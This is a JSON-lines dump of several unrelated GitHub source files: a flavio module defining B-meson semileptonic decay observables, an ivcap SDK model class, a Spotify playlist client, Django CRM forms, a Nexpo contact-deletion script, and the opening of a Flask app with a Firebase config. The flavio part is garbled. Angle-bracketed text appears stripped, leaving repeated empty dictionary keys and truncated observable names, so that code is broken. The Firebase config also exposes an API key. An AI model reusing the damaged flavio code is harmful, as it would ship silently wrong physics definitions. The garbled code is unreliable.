lep)\n return dGdq2_L(J) / dGdq2(J)\n\n\ndef FL_binned(q2min, q2max, wc_obj, par, B, V, lep):\n num = flavio.math.integrate.nintegrate(lambda q2: dBRdq2(q2, wc_obj, par, B, V, lep, A='L'), q2min, q2max)\n if num == 0:\n return 0\n denom = flavio.math.integrate.nintegrate(lambda q2: dBRdq2(q2, wc_obj, par, B, V, lep, A=None), q2min, q2max)\n return num / denom\n\ndef Itot_norm(fct_J, wc_obj, par, B, V, lep):\n def fct(q2):\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n return fct_J(J)\n num = obs_q2int(fct, wc_obj, par, B, V, lep)\n def fct_den(q2):\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n return dGdq2(J)\n den = obs_q2int(fct_den, wc_obj, par, B, V, lep)\n return num / den\n\ndef dBR_dq2_dcosthl_binned(q2, clmin, clmax, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dcosthl(J)\n ang_min = _cos_angle_int(clmin)\n ang_max = _cos_angle_int(clmax)\n return BRfac(V) * tauB * sum(\n [y * (ang_max[a] - ang_min[a]) for a, y in dG.items()])\n\ndef BR_binned_costhl(clmin, clmax, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dcosthl_binned(q2, clmin, clmax, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef dBR_dq2_dcosthl(q2, cl, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dcosthl(J)\n ang = _cos_angle_diff(cl)\n return BRfac(V) * tauB * sum(\n [y * ang[a] for a, y in dG.items()])\n\ndef dBR_dcosthl(cl, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dcosthl(q2, cl, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef dBR_dq2_dcosthV_binned(q2, cVmin, cVmax, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dcosthV(J)\n ang_min = _cos_angle_int(cVmin)\n ang_max = _cos_angle_int(cVmax)\n return BRfac(V) * tauB * sum(\n [y * (ang_max[a] - ang_min[a]) for a, y in dG.items()])\n\ndef BR_binned_costhV(cVmin, cVmax, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dcosthV_binned(q2, cVmin, cVmax, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef dBR_dq2_dcosthV(q2, cV, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dcosthV(J)\n ang = _cos_angle_diff(cV)\n return BRfac(V) * tauB * sum(\n [y * ang[a] for a, y in dG.items()])\n\ndef dBR_dcosthV(cV, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dcosthV(q2, cV, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef dBR_dq2_dphi_binned(q2, phimin, phimax, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dphi(J)\n ang_min = _angle_int(phimin)\n ang_max = _angle_int(phimax)\n return BRfac(V) * tauB * sum(\n [y * (ang_max[a] - ang_min[a]) for a, y in dG.items()])\n\ndef BR_binned_phi(phimin, phimax, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dphi_binned(q2, phimin, phimax, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\n\ndef dBR_dq2_dphi(q2, phi, wc_obj, par, B, V, lep):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n dG = dG_dq2_dphi(J)\n ang = _angle_diff(phi)\n return BRfac(V) * tauB * sum(\n [y * ang[a] for a, y in dG.items()])\n\ndef dBR_dphi(phi, wc_obj, par, B, V, lep):\n def fct(q2):\n return dBR_dq2_dphi(q2, phi, wc_obj, par, B, V, lep)\n return obs_q2int(fct, wc_obj, par, B, V, lep)\n\ndef BRfac(V):\n if V == 'rho0' or V == 'omega':\n # factor of 1/2 for neutral rho due to rho = (uubar-ddbar)/sqrt(2)\n # and also for omega = (uubar+ddbar)/sqrt(2)\n return 1/2.\n else:\n return 1\n\ndef dBRdq2_lep(q2, wc_obj, par, B, V, lep, A):\n if not kinem_allowed(q2, par, B, V, lep):\n return 0\n tauB = par['tau_'+B]\n J = get_angularcoeff(q2, wc_obj, par, B, V, lep)\n if A is None:\n return tauB * dGdq2(J) * BRfac(V)\n elif A == 'L':\n return tauB * dGdq2_L(J) * BRfac(V)\n elif A == 'T':\n return tauB * dGdq2_T(J) * BRfac(V)\n\n\ndef dBRdq2(q2, wc_obj, par, B, V, lep, A):\n if lep == 'l':\n # average of e and mu!\n return (dBRdq2_lep(q2, wc_obj, par, B, V, 'e', A) + dBRdq2_lep(q2, wc_obj, par, B, V, 'mu', A))/2\n else:\n return dBRdq2_lep(q2, wc_obj, par, B, V, lep, A)\n\ndef dBRdq2_function(B, V, lep, A):\n return lambda wc_obj, par, q2: dBRdq2(q2, wc_obj, par, B, V, lep, A)\n\ndef BR_binned(q2min, q2max, wc_obj, par, B, V, lep, A):\n def integrand(q2):\n return dBRdq2(q2, wc_obj, par, B, V, lep, A)\n return flavio.math.integrate.nintegrate(integrand, q2min, q2max)\n\ndef BR_binned_function(B, V, lep, A):\n return lambda wc_obj, par, q2min, q2max: BR_binned(q2min, q2max, wc_obj, par, B, V, lep, A)\n\ndef BR_binned_tot_function(B, V, lep, A):\n def f(wc_obj, par, q2min, q2max):\n num = BR_binned(q2min, q2max, wc_obj, par, B, V, lep, A)\n if num == 0:\n return 0\n den = BR_tot(wc_obj, par, B, V, lep, A)\n return num / den\n return f\n\ndef FL_function(B, V, lep):\n return lambda wc_obj, par, q2: FL_diff(q2, wc_obj, par, B, V, lep)\n\ndef FL_binned_function(B, V, lep):\n return lambda wc_obj, par, q2min, q2max: FL_binned(q2min, q2max, wc_obj, par, B, V, lep)\n\ndef FL_tot_function(B, V, lep):\n def f(wc_obj, par):\n mB = par['m_'+B]\n mV = par['m_'+V]\n ml = par['m_'+lep]\n q2max = (mB-mV)**2\n q2min = ml**2\n return FL_binned(q2min, q2max, wc_obj, par, B, V, lep)\n return f\n\ndef FLt_tot_function(B, V, lep):\n def f(wc_obj, par):\n def fct_J(J):\n return -J['2c']\n return Itot_norm(fct_J, wc_obj, par, B, V, lep)\n return f\n\ndef AFB_tot_function(B, V, lep):\n def f(wc_obj, par):\n def fct_J(J):\n return 3 / 8 * (2 * J['6s'] + J['6c'])\n return Itot_norm(fct_J, wc_obj, par, B, V, lep)\n return f\n\ndef I3_tot_function(B, V, lep):\n def f(wc_obj, par):\n def fct_J(J):\n return J[3]\n return Itot_norm(fct_J, wc_obj, par, B, V, lep)\n return f\n\n\ndef BR_binned_costhl_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, clmin, clmax: (\n BR_binned_costhl(clmin, clmax, wc_obj, par, B, V, 'e')\n + BR_binned_costhl(clmin, clmax, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, clmin, clmax: BR_binned_costhl(clmin, clmax, wc_obj, par, B, V, lep)\n\ndef BR_binned_costhV_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, cVmin, cVmax: (\n BR_binned_costhV(cVmin, cVmax, wc_obj, par, B, V, 'e')\n + BR_binned_costhV(cVmin, cVmax, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, cVmin, cVmax: BR_binned_costhV(cVmin, cVmax, wc_obj, par, B, V, lep)\n\ndef BR_binned_phi_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, phimin, phimax: (\n BR_binned_phi(phimin, phimax, wc_obj, par, B, V, 'e')\n + BR_binned_phi(phimin, phimax, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, phimin, phimax: BR_binned_phi(phimin, phimax, wc_obj, par, B, V, lep)\n\ndef dBR_dcosthl_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, cl: (\n dBR_dcosthl(cl, wc_obj, par, B, V, 'e')\n + dBR_dcosthl(cl, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, cl: dBR_dcosthl(cl, wc_obj, par, B, V, lep)\n\ndef dBR_dcosthV_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, cV: (\n dBR_dcosthV(cV, wc_obj, par, B, V, 'e')\n + dBR_dcosthV(cV, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, cV: dBR_dcosthV(cV, wc_obj, par, B, V, lep)\n\ndef dBR_dphi_function(B, V, lep):\n if lep == 'l':\n return lambda wc_obj, par, phi: (\n dBR_dphi(phi, wc_obj, par, B, V, 'e')\n + dBR_dphi(phi, wc_obj, par, B, V, 'mu'))/2.\n return lambda wc_obj, par, phi: dBR_dphi(phi, wc_obj, par, B, V, lep)\n\ndef _BR_tot(wc_obj, par, B, V, lep, A):\n mB = par['m_'+B]\n mV = par['m_'+V]\n ml = par['m_'+lep]\n q2max = (mB-mV)**2\n q2min = ml**2\n return BR_binned(q2min, q2max, wc_obj, par, B, V, lep, A)\n\ndef BR_tot(wc_obj, par, B, V, lep, A):\n if lep == 'l':\n # average of e and mu!\n return (_BR_tot(wc_obj, par, B, V, 'e', A)+_BR_tot(wc_obj, par, B, V, 'mu', A))/2.\n else:\n return _BR_tot(wc_obj, par, B, V, lep, A)\n\ndef BR_tot_function(B, V, lep, A):\n return lambda wc_obj, par: BR_tot(wc_obj, par, B, V, lep, A)\n\ndef BR_binned_leptonflavour(q2min, q2max, wc_obj, par, B, V, lnum, lden, A):\n num = BR_binned(q2min, q2max, wc_obj, par, B, V, lnum, A)\n if num == 0:\n return 0\n den = BR_binned(q2min, q2max, wc_obj, par, B, V, lden, A)\n return num/den\n\ndef BR_tot_leptonflavour(wc_obj, par, B, V, lnum, lden, A):\n num = BR_tot(wc_obj, par, B, V, lnum, A)\n if num == 0:\n return 0\n den = BR_tot(wc_obj, par, B, V, lden, A)\n return num/den\n\ndef BR_tot_leptonflavour_function(B, V, lnum, lden, A):\n return lambda wc_obj, par: BR_tot_leptonflavour(wc_obj, par, B, V, lnum, lden, A)\n\ndef BR_binned_leptonflavour_function(B, V, lnum, lden, A):\n return lambda wc_obj, par, q2min, q2max: BR_binned_leptonflavour(q2min, q2max, wc_obj, par, B, V, lnum, lden, A)\n\n\n# Observable and Prediction instances\n\n_tex = {'e': 'e', 'mu': '\\mu', 'tau': r'\\tau', 'l': r'\\ell'}\n\n_A = {'dBR/dq2': None, 'BR': None, '
': None,\n 'dBR_L/dq2': 'L', 'BR_L': 'L', '': 'L',\n 'dBR_T/dq2': 'T', 'BR_T': 'T', '': 'T',\n }\n_func = {'dBR/dq2': dBRdq2_function, 'BR': BR_tot_function, '
': BR_binned_function,\n 'dBR_L/dq2': dBRdq2_function, 'BR_L': BR_tot_function, '': BR_binned_function,\n 'dBR_T/dq2': dBRdq2_function, 'BR_T': BR_tot_function, '': BR_binned_function,\n '
/': BR_binned_costhl_function,\n '
/': BR_binned_costhV_function,\n '
/': BR_binned_phi_function,\n 'dBR/dcl': dBR_dcosthl_function,\n 'dBR/dcV': dBR_dcosthV_function,\n 'dBR/dphi': dBR_dphi_function,\n 'FL': FL_function,\n '': FL_binned_function,\n 'FLtot': FL_tot_function,\n 'FLttot': FLt_tot_function,\n 'AFBtot': AFB_tot_function,\n 'I3tot': I3_tot_function,\n }\n_desc = {'dBR/dq2': r'$q^2$-differential', 'BR': 'Total', '
': '$q^2$-binned',\n 'dBR_L/dq2': 'Differential longitudinal', 'BR_L': 'Total longitudinal', '': 'Binned longitudinal',\n 'dBR_T/dq2': 'Differential transverse', 'BR_T': 'Total transverse', '': 'Binned transverse',\n '
/': r'$\\cos\\theta_l$-binned',\n '
/': r'$\\cos\\theta_V$-binned',\n '
/': r'$\\phi$-binned',\n 'dBR/dcl': r'$\\cos\\theta_l$-differential',\n 'dBR/dcV':r'$\\cos\\theta_V$-differential ',\n 'dBR/dphi': r'$\\phi$-differential',\n 'FL': r'Differential longitudinal polarization fraction',\n '': r'Binned longitudinal polarization fraction',\n 'FLtot': r'Total longitudinal polarization fraction',\n 'FLttot': r'Total longitudinal polarization fraction',\n 'AFBtot': r'Total forward-backward asymmetry',\n 'I3tot': r'$q^2$-integrated angular coefficient $I_3$',\n }\n_tex_br = {'dBR/dq2': r'\\frac{d\\text{BR}}{dq^2}', 'BR': r'\\text{BR}', '
': r'\\langle\\text{BR}\\rangle',\n 'dBR_L/dq2': r'\\frac{d\\text{BR}_L}{dq^2}', 'BR_L': r'\\text{BR}_L', '': r'\\langle\\text{BR}_L\\rangle',\n 'dBR_T/dq2': r'\\frac{d\\text{BR}_T}{dq^2}', 'BR_T': r'\\text{BR}_T', '': r'\\langle\\text{BR}_T\\rangle',\n '
/': r'\\langle\\text{BR}\\rangle/\\Delta\\cos\\theta_l',\n '
/': r'\\langle\\text{BR}\\rangle/\\Delta\\cos\\theta_V',\n '
/': r'\\langle\\text{BR}\\rangle/\\Delta\\phi',\n 'dBR/dcl': r'\\frac{d\\text{BR}}{d\\cos\\theta_l}',\n 'dBR/dcV': r'\\frac{d\\text{BR}}{d\\cos\\theta_V}',\n 'dBR/dphi': r'\\frac{d\\text{BR}}{d\\phi}',\n 'FL': r'F_L',\n '': r'\\langle F_L\\rangle',\n 'FLtot': r'F_L',\n 'FLttot': r'\\widetilde{F}_L',\n 'AFBtot': r'A_\\text{FB}',\n 'I3tot': r'I_3',\n }\n_args = {'dBR/dq2': ['q2'], 'BR': None, '
': ['q2min', 'q2max'],\n 'dBR_L/dq2': ['q2'], 'BR_L': None, '': ['q2min', 'q2max'],\n 'dBR_T/dq2': ['q2'], 'BR_T': None, '': ['q2min', 'q2max'],\n '
/': ['clmin', 'clmax'],\n '
/': ['cVmin', 'cVmax'],\n '
/': ['phimin', 'phimax'],\n 'dBR/dcl': ['cl'],\n 'dBR/dcV': ['cV'],\n 'dBR/dphi': ['phi'],\n 'FL': ['q2'],\n '': ['q2min', 'q2max'],\n 'FLtot': None,\n 'FLttot': None,\n 'AFBtot': None,\n 'I3tot': None,\n }\n_hadr = {\n'B0->D*': {'tex': r\"B^0\\to D^{\\ast -}\", 'B': 'B0', 'V': 'D*+', },\n'B+->D*': {'tex': r\"B^+\\to D^{\\ast 0}\", 'B': 'B+', 'V': 'D*0', },\n'B0->rho': {'tex': r\"B^0\\to \\rho^-\", 'B': 'B0', 'V': 'rho+', },\n'B+->rho': {'tex': r\"B^+\\to \\rho^0\", 'B': 'B+', 'V': 'rho0', },\n'B+->omega': {'tex': r\"B^+\\to \\omega \", 'B': 'B+', 'V': 'omega', },\n'Bs->K*': {'tex': r\"B_s\\to K^{* -} \", 'B': 'Bs', 'V': 'K*+', },\n}\n# for LF ratios we don't distinguish B+ and B0 (but take B0 because we have to choose sth)\n_hadr_l = {\n'B->D*': {'tex': r\"B\\to D^{\\ast}\", 'B': 'B0', 'V': 'D*+', 'decays': ['B0->D*', 'B+->D*'],},\n'B->rho': {'tex': r\"B\\to \\rho\", 'B': 'B0', 'V': 'rho+', 'decays': ['B0->rho', 'B+->rho'],},\n'B+->omega': {'tex': r\"B^+\\to \\omega \", 'B': 'B+', 'V': 'omega', 'decays': ['B+->omega'],},\n'Bs->K*': {'tex': r\"B_s\\to K^{* -} \", 'B': 'Bs', 'V': 'K*+', 'decays': ['Bs->K*'],},\n}\n\n_process_taxonomy = r'Process :: $b$ hadron decays :: Semi-leptonic tree-level decays :: $B\\to V\\ell\\nu$ :: $'\n\nfor l in ['e', 'mu', 'tau', 'l']:\n for br in ['dBR/dq2', 'BR', '
',\n 'dBR_L/dq2', 'BR_L', '',\n 'dBR_T/dq2', 'BR_T', '',\n '
/', '
/', '
/',\n 'dBR/dcl', 'dBR/dcV', 'dBR/dphi',\n '', 'FL', 'FLtot', 'FLttot', 'AFBtot', 'I3tot']:\n for M in _hadr.keys():\n _process_tex = _hadr[M]['tex']+_tex[l]+r\"^+\\nu_\"+_tex[l]\n _obs_name = br + \"(\"+M+l+\"nu)\"\n _obs = Observable(_obs_name)\n _obs.set_description(_desc[br] + r\" branching ratio of $\" + _process_tex + \"$\")\n _obs.tex = r'$' + _tex_br[br] + r\"(\" +_process_tex + \")$\"\n _obs.arguments = _args[br]\n _obs.add_taxonomy(_process_taxonomy + _process_tex + r'$')\n if br in _A:\n # for dBR/dq2, need to distinguish between total, L, and T\n Prediction(_obs_name, _func[br](_hadr[M]['B'], _hadr[M]['V'], l, A=_A[br]))\n else:\n # for other observables not\n Prediction(_obs_name, _func[br](_hadr[M]['B'], _hadr[M]['V'], l))\n\n\n# Lepton flavour ratios\nfor l in [('mu','e'), ('tau','mu'), ('tau', 'l')]:\n for M in _hadr_l.keys():\n\n # binned ratio of BRs\n _obs_name = \"(\"+M+\"lnu)\"\n _obs = Observable(name=_obs_name, arguments=['q2min', 'q2max'])\n _obs.set_description(r\"Ratio of partial branching ratios of $\" + _hadr_l[M]['tex'] +_tex[l[0]]+r\"^+ \\nu_\"+_tex[l[0]]+r\"$\" + \" and \" + r\"$\" + _hadr_l[M]['tex'] +_tex[l[1]]+r\"^+ \\nu_\"+_tex[l[1]]+r\"$\")\n _obs.tex = r\"$\\langle R_{\" + _tex[l[0]] + ' ' + _tex[l[1]] + r\"} \\rangle(\" + _hadr_l[M]['tex'] + r\"\\ell^+\\nu)$\"\n for li in l:\n for N in _hadr_l[M]['decays']:\n # add taxonomy for both processes (e.g. B->Venu and B->Vmunu) and for charged and neutral\n _obs.add_taxonomy(_process_taxonomy + _hadr[N]['tex'] + _tex[li]+r\"^+\\nu_\"+_tex[li]+r\"$\")\n Prediction(_obs_name, BR_binned_leptonflavour_function(_hadr_l[M]['B'], _hadr_l[M]['V'], l[0], l[1], A=None))\n\n # ratio of total BRs\n _obs_name = \"R\"+l[0]+l[1]+\"(\"+M+\"lnu)\"\n _obs = Observable(name=_obs_name)\n _obs.set_description(r\"Ratio of total branching ratios of $\" + _hadr_l[M]['tex'] +_tex[l[0]]+r\"^+ \\nu_\"+_tex[l[0]]+r\"$\" + \" and \" + r\"$\" + _hadr_l[M]['tex'] +_tex[l[1]]+r\"^+ \\nu_\"+_tex[l[1]]+r\"$\")\n _obs.tex = r\"$R_{\" + _tex[l[0]] + ' ' + _tex[l[1]] + r\"}(\" + _hadr_l[M]['tex'] + r\"\\ell^+\\nu)$\"\n for li in l:\n for N in _hadr_l[M]['decays']:\n # add taxonomy for both processes (e.g. B->Venu and B->Vmunu) and for charged and neutral\n _obs.add_taxonomy(_process_taxonomy + _hadr[N]['tex'] +_tex[li]+r\"^+\\nu_\"+_tex[li]+r\"$\")\n Prediction(_obs_name, BR_tot_leptonflavour_function(_hadr_l[M]['B'], _hadr_l[M]['V'], l[0], l[1], A=None))\n\n\n# B->D*taunu normalized binned BR\n_obs_name = \"
/BR(B->D*taunu)\"\n_obs = Observable(name=_obs_name, arguments=['q2min', 'q2max'])\n_obs.set_description(r\"Relative partial branching ratio of $B\\to D^\\ast\\tau^+\\nu$\")\n_obs.tex = r\"$\\frac{\\langle \\text{BR} \\rangle}{\\text{BR}}(B\\to D^\\ast\\tau^+\\nu)$\"\nfor M in ['B+->D*', 'B0->D*']:\n _process_tex = _hadr[M]['tex'] + r\"\\tau^+\\nu\"\n _obs.add_taxonomy(_process_taxonomy + _process_tex + r\"$\")\nPrediction(_obs_name, BR_binned_tot_function('B0', 'D*+', 'tau', A=None))\n","repo_name":"flav-io/flavio","sub_path":"flavio/physics/bdecays/bvlnu.py","file_name":"bvlnu.py","file_ext":"py","file_size_in_byte":24633,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"5"} +{"seq_id":"15358386644","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union, cast\n\nimport attr\n\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.resource_memory_t import ResourceMemoryT\n\n\nT = TypeVar(\"T\", bound=\"BasicWorkflowOptsT\")\n\n\n@attr.s(auto_attribs=True)\nclass BasicWorkflowOptsT:\n \"\"\"\n Example:\n {'command': ['Odit dolorum nulla quo.', 'Asperiores temporibus.', 'Ut voluptatem.'], 'cpu': {'limit': 'Quidem\n nulla quae provident dolor amet nulla.', 'request': 'Et aut autem deserunt sit architecto.'}, 'image': 'Est esse\n voluptas consectetur quia.', 'memory': {'limit': 'Quidem nulla quae provident dolor amet nulla.', 'request': 'Et\n aut autem deserunt sit architecto.'}}\n\n Attributes:\n command (Union[Unset, List[str]]): Command to start the container - needed for some container runtimes Example:\n ['Sed error id et cupiditate.', 'Ratione qui amet reiciendis debitis.', 'Reprehenderit voluptate nostrum\n quibusdam quia.', 'Neque sapiente commodi dolorem.'].\n cpu (Union[Unset, ResourceMemoryT]): See\n and https://kubernetes.io/docs/reference/kubernetes-api/common-definitions/quantity/ for units Example:\n {'limit': 'Molestiae et ex hic aut dicta dolorem.', 'request': 'Voluptas odit.'}.\n image (Union[Unset, str]): container image name Example: Reprehenderit ratione accusamus maxime iusto iste..\n memory (Union[Unset, ResourceMemoryT]): See\n and https://kubernetes.io/docs/reference/kubernetes-api/common-definitions/quantity/ for units Example:\n {'limit': 'Molestiae et ex hic aut dicta dolorem.', 'request': 'Voluptas odit.'}.\n \"\"\"\n\n command: Union[Unset, List[str]] = UNSET\n cpu: Union[Unset, \"ResourceMemoryT\"] = UNSET\n image: Union[Unset, str] = UNSET\n memory: Union[Unset, \"ResourceMemoryT\"] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n command: Union[Unset, List[str]] = UNSET\n if not isinstance(self.command, Unset):\n command = self.command\n\n cpu: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.cpu, Unset):\n cpu = self.cpu.to_dict()\n\n image = self.image\n memory: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.memory, Unset):\n memory = self.memory.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if command is not UNSET:\n field_dict[\"command\"] = command\n if cpu is not UNSET:\n field_dict[\"cpu\"] = cpu\n if image is not UNSET:\n field_dict[\"image\"] = image\n if memory is not UNSET:\n field_dict[\"memory\"] = memory\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.resource_memory_t import ResourceMemoryT\n\n d = src_dict.copy()\n command = cast(List[str], d.pop(\"command\", UNSET))\n\n _cpu = d.pop(\"cpu\", UNSET)\n cpu: Union[Unset, ResourceMemoryT]\n if isinstance(_cpu, Unset):\n cpu = UNSET\n else:\n cpu = ResourceMemoryT.from_dict(_cpu)\n\n image = d.pop(\"image\", UNSET)\n\n _memory = d.pop(\"memory\", UNSET)\n memory: Union[Unset, ResourceMemoryT]\n if isinstance(_memory, Unset):\n memory = UNSET\n else:\n memory = ResourceMemoryT.from_dict(_memory)\n\n basic_workflow_opts_t = cls(\n command=command,\n cpu=cpu,\n image=image,\n memory=memory,\n )\n\n basic_workflow_opts_t.additional_properties = d\n return basic_workflow_opts_t\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"reinventingscience/ivcap-sdk-python","sub_path":"sdk_client/src/ivcap_client/models/basic_workflow_opts_t.py","file_name":"basic_workflow_opts_t.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35399459613","text":"import spotipy\nimport spotipy.util as util\n\n\nclass SpotifyClient(object):\n \"\"\"Log into Spotify\"\"\"\n def __init__(self, spotify_user_id, spotify_scope, spotify_client_id, spotify_client_secret, spotify_redirect_url):\n print('\\n Initialising Spotify Client...')\n spotify_token = util.prompt_for_user_token(spotify_user_id, spotify_scope,\n client_id=spotify_client_id,\n client_secret=spotify_client_secret,\n redirect_uri=spotify_redirect_url)\n\n if spotify_token:\n spotify_client = spotipy.Spotify(auth=spotify_token)\n\n self.spotify_user_id = spotify_user_id\n self.spotify_token = spotify_token\n self.spotify_client = spotify_client\n\n else:\n print(\"Cannot get Spotify token\")\n\n def create_playlist(self, spotify_playlist_name):\n \"\"\"Create A New Spotify Playlist\"\"\"\n self.spotify_client.user_playlist_create(self.spotify_user_id, name=spotify_playlist_name)\n\n playlist_id = ''\n playlists = self.spotify_client.user_playlists(self.spotify_user_id)\n for playlist in playlists['items']: # iterate through playlists I follow\n if playlist['name'] == spotify_playlist_name: # filter for newly created playlist\n playlist_id = playlist['id']\n print(\"Spotify playlist '{}' (id: {}) created.\".format(spotify_playlist_name, playlist_id))\n\n return playlist_id\n\n def search_spotify_tracks_uri(self, artist, track_name):\n \"\"\"Search For the Track\"\"\"\n results = self.spotify_client.search(q=f\"{track_name} {artist} \",\n limit=5, type='track') # get 5 responses since first isn't always accurate\n\n if results['tracks']['total'] > 0: # if track isn't on spotify as queried, go to next track\n uri = results['tracks']['items'][0]['uri']\n return uri\n else:\n print(\"No track found for {} - {}\".format(artist, track_name))\n\n def add_tracks_to_spotify_playlist(self, spotify_playlist_name, uris):\n \"\"\"Add Tracks To a Spotify Playlist\"\"\"\n\n # create a new playlist\n playlist_id = self.create_playlist(spotify_playlist_name)\n\n # add all tracks to the new playlist (Note: You can add a maximum of 100 tracks per request.)\n while uris:\n results = self.spotify_client.user_playlist_add_tracks(self.spotify_user_id, playlist_id, uris[:100])\n uris = uris[100:]\n return results\n","repo_name":"jeremyndeby/Youtube_To_Spotify_Automation","sub_path":"spotify_client.py","file_name":"spotify_client.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41467566997","text":"from dataclasses import field\nfrom django import forms\nfrom django.contrib.auth import get_user_model\nfrom .models import Category, Lead, Agent\nfrom django.contrib.auth.forms import UserCreationForm, UsernameField\n\n# retrieves the our custom user model\nUser = get_user_model()\n\nclass CustomUserCreationForm(UserCreationForm):\n class Meta:\n model = User\n fields = (\"username\",)\n field_classes = {'username': UsernameField}\n\nclass LeadModelForm(forms.ModelForm):\n class Meta:\n model = Lead\n fields = (\n 'first_name',\n 'last_name',\n 'age',\n 'agent', \n 'description',\n 'phone_number',\n 'email'\n\n )\n\nclass LeadForm(forms.Form):\n first_name = forms.CharField()\n last_name = forms.CharField()\n age = forms.IntegerField(min_value=0)\n\nclass AssignAgentForm(forms.Form):\n agents = forms.ModelChoiceField(queryset=Agent.objects.none())\n\n def __init__(self, *args, **kwards):\n request = kwards.pop(\"request\")\n agents = Agent.objects.filter(organization=request.user.userprofilemodel)\n super(AssignAgentForm,self).__init__(*args, **kwards)\n self.fields[\"agents\"].queryset = agents\n \nclass LeadCategoryUpdateForm(forms.ModelForm):\n class Meta:\n model = Lead\n fields = (\n 'category',\n )","repo_name":"IvansanchezEspinoza2019/crm-django","sub_path":"leads/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44004885288","text":"import requests\n\nimport sys\nsys.path.append(\"..\")\nimport login\n\n\"\"\"\nDelete a Contact by using its id\n\"\"\"\n\nif len(sys.argv) > 1:\n contact_id = sys.argv[1]\nelse:\n contact_id = input(\"Enter the contact id to delete: \")\n\ntoken = login.get_token()\n \nurl = f\"https://www.nexpo.arkadtlth.se/api/contacts/{contact_id}\"\n\nheaders = {\n 'Authorization': token,\n}\n\nr = requests.delete(url, headers=headers)\n\nprint(r.status_code)\n\nif r.status_code == 200 or r.status_code == 204:\n print(f\"Successfully deleted contact with id {contact_id}.\")\nelse:\n print(f\"Failed to delete contact with id {contact_id}. Error: {r.text}\")","repo_name":"careerfairsystems/nexpo-backend-nova","sub_path":"UploadToDB/Contact/deleteContact.py","file_name":"deleteContact.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"18068930361","text":"from flask import Flask, jsonify\r\nimport json\r\nimport pyrebase\r\n\r\n#config for pyrebase (python wrapper for firebase)\r\nconfig = {\r\n \"apiKey\": \"AIzaSyD2UPwPcvgPKZ56qXOSAxnmSlUZSPMMsmc\",\r\n \"authDomain\": \"cookbook-94ca3.firebaseapp.com\",\r\n \"databaseURL\": \"https://cookbook-94ca3.firebaseio.com\",\r\n \"storageBucket\": \"cookbook-94ca3.appspot.com\"\r\n}\r\nfirebase = pyrebase.initialize_app(config)\r\ndb = 